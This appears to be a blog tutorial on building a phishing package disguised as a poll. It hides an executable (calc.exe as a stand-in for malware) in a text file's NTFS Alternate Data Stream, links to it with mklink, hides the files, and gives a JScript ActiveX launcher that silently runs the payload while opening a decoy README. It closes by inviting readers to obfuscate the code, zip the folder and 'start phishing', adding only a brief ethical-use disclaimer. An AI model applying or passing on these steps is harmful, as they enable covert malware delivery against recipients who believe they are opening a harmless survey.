In our scenario, we assume that we are sending four files (two of them preferrably hidden) inside a zipped directory as part of a Poll research:
1) The first file is Poll.txt file, which is parallel to the subject of our phishing attack. It contains some multiple choice questions inside.
Here our purpose is to embed malware.exe (here calc.exe) into Poll.txt. We need the following command to embed the exe into Alternate Data Streams field of the text file:
type calc.exe > Poll.txt:calc.exe
Now, we have Poll.txt embedded another exe file inside. You can verify this by using “dir /r” command.
2) It is not possible anymore calling an embedded file from within ADS field of a file. But there is a workaround for this. First, we need to create a symbolic link to the embedded file:
mklink config.txt Poll.txt:calc.exe
Now, if you’ll type ‘config.txt’ on command prompt, you’ll see calc.exe popping up (but double clicking on that file doesn’t have the same effect). You can make the file hidden by using its property options.
3) Create another text file README.txt and put some text into it. You can make that file hidden as well.
var objShell = new ActiveXObject(“shell.application”);
objShell.ShellExecute(“cmd.exe”, “/c config.txt”, “”, “open”, 0);
objShell.ShellExecute(“README.txt”, “”, “”, “open”, 1);
You can obfuscate this code of course. I leave it to you.
We are done. Now you can zip this directory and start phishing 🙂
(Please use such techniques only for ethical pen testing purposes, it is illegal to use otherwise and don’t be fool).